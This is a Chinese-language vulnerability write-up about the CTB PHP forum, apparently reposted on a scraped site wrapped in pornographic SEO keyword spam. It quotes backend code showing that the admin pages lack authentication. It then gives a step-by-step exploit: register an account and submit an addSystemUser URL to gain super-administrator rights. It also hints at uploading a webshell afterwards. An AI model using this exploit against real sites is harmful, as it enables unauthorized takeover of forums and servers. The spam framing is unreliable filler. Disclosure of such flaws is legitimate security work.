六月婷婷综合激情-六月婷婷综合-六月婷婷在线观看-六月婷婷在线-亚洲黄色在线网站-亚洲黄色在线观看网站

明輝手游網(wǎng)中心:是一個(gè)免費(fèi)提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺(tái)!

漂亮但不安全的CTB

[摘要]>>>Dedicated This Scrap To CaoJing<<< 涉及版本: ^^^^^^^ 目前所有版本(現(xiàn)在1.3Alpha為最高版本) 描述: ^^^^^^ CTB是一款由實(shí)易數(shù)碼<11cn.org>;開(kāi)發(fā)和維護(hù)的源代碼開(kāi)放的PHP論...

>>>Dedicated This Scrap To CaoJing<<< 

涉及版本: 
^^^^^^^ 
目前所有版本(現(xiàn)在1.3Alpha為最高版本) 

描述: 
^^^^^^ 
CTB是一款由實(shí)易數(shù)碼<11cn.org>;開(kāi)發(fā)和維護(hù)的源代碼開(kāi)放的PHP論壇。由于其后臺(tái)管理文件驗(yàn)證存在缺陷,可能導(dǎo)致非法用戶(hù)直接添加論壇超級(jí)管理員,進(jìn)而威脅論壇或服務(wù)器安全。 

具體: 
^^^^ 
CTB書(shū)寫(xiě)非常規(guī)范,代碼井然有序,賞心悅目,的確是優(yōu)美的程序;特別是其功能模塊,著實(shí)讓小弟學(xué)習(xí)了一把。但安全方面卻令人堪憂: 

試看如下代碼: 

/admin/main.php 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 //獲取get變量 
   if( is_array($_GET) ) { 
      foreach($_GET as $k=>$v) { 
           if( is_array( $_GET[$k]) ) { 
               foreach($_GET[$k] as $k2=>$v2) { 
                   $return[$k][$k2] = $v2; 
               } 
           } else { 
               $return[$k] = $v; 
           } 
       } 

... 
$mod = isset($_GET['mod']) ? $_GET['mod'] : $_POST['mod']; 
   if (!file_exists($mod.".php" { 
       $mod = "mainright"; 
   } 
   require_once ($mod.".php"; 
   //----------------------------------------------------------------------------- 

   //初始化類(lèi)變量 
   $ctb = new Module; 
   $ctb->set = $set; 
   $ctb->tplPath = "./templates"; 
   $ctb->input = $return; 
   $ctb->sess = isset($_COOKIE["sess_adminname"]) ? $_COOKIE : $_SESSION; 
   $ctb->execute(); 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

這里沒(méi)有任何驗(yàn)證,我們看看添加管理員的文件: 

/admin/systemuser.php 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
class Module extends CommonClass 
//系統(tǒng)管理模塊子類(lèi) 

   function execute() { 
       switch($this->input['action']) { 
... 
case 'addSystemUser': 
               $this->addSystemUser(); 
               break; 
... 
    }       
   } 

function addSystemUser() 

   //輸入數(shù)據(jù)簡(jiǎn)單格式化 
   $this->inputCheck("main.php?mod=systemuser&action=showSystemUser"; 
   //執(zhí)行添加操作 
        $this->file = "../".$this->set[dataPath]."/users/list.php"; 
   $systemLine = $this->select(4, $this->input['systemUserName']); 
.... 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

依然沒(méi)有驗(yàn)證,一路順利啊! 

利用方法: 
^^^^^^^ 
先注冊(cè)一個(gè)用戶(hù): 

登陸ID:  cat 
用戶(hù)名 :   dog 
密碼:      ilikecat 
重復(fù)密碼:  ilikecat 
信箱:      cat@dog.com 

接著提交如下URL: 

http://www.target.com/ctb/admin/main.php?mod=systemuser&systemUserName=dog&systemUserMode=1&action=addSystemUser

哈哈,你現(xiàn)在已經(jīng)是超級(jí)管理員了,不相信?提交如下URL后臺(tái)登陸: 

http://www.psych.com/ctb/admin/main.php?mod=login 

管理名稱(chēng):  cat 
管理密碼:  ilikecat 

咦...還真成功了! 

你現(xiàn)在是不是想更改后臺(tái)上傳文件類(lèi)型,然后upload webshell?哼,被我猜到了吧... 

后記:另外發(fā)現(xiàn)CTB代碼注釋有些扎眼的錯(cuò)別字,大煞風(fēng)景,希望可以一起修正。


標(biāo)簽:漂亮但不安全的CTB 
主站蜘蛛池模板: 色妞影视 | 五月婷婷综合激情网 | 在线视频一区二区三区在线播放 | 青娱乐在线免费观看 | 日本动态120秒免费 日本叼嗨 | 日韩丝袜亚洲国产欧美一区 | 午夜老司机在线观看免费 | 中国日韩欧美中文日韩欧美色 | 色综合久久综合网观看 | 四虎影永久在线高清免费 | 特一级黄 | 色先锋资源站 | 五月婷婷之综合激情 | 亚洲福利在线看 | 青草国产在线观看 | 午夜视频在线观看网站 | 日本免费三区 | 一级成人a做片免费 | 青青久操| 中文字幕亚洲一区二区v@在线 | 亚洲a成人7777777久久 | 亚洲自拍小视频 | 亚洲人成高清 | 特级黄色视频毛片 | 四虎影院免费在线 | 五月婷婷啪啪 | 天天伊人 | 无码精品日韩中文字幕 | 亚洲激情视频在线播放 | 中文字幕亚洲日本岛国片 | 青草影院在线观看免费版 | 欧美性猛交xxxx乱大交极品 | 宇都宫紫苑(rion)在线播放 | 亚洲第一在线播放 | 亚洲国产日韩综合久久精品 | 午夜久久免费视频 | 亚洲国产精品成人综合色在线婷婷 | 中文字幕乱视频 | 伊人久久大香线蕉综合7 | 人人爱人人做 | 四虎影视在线影院www |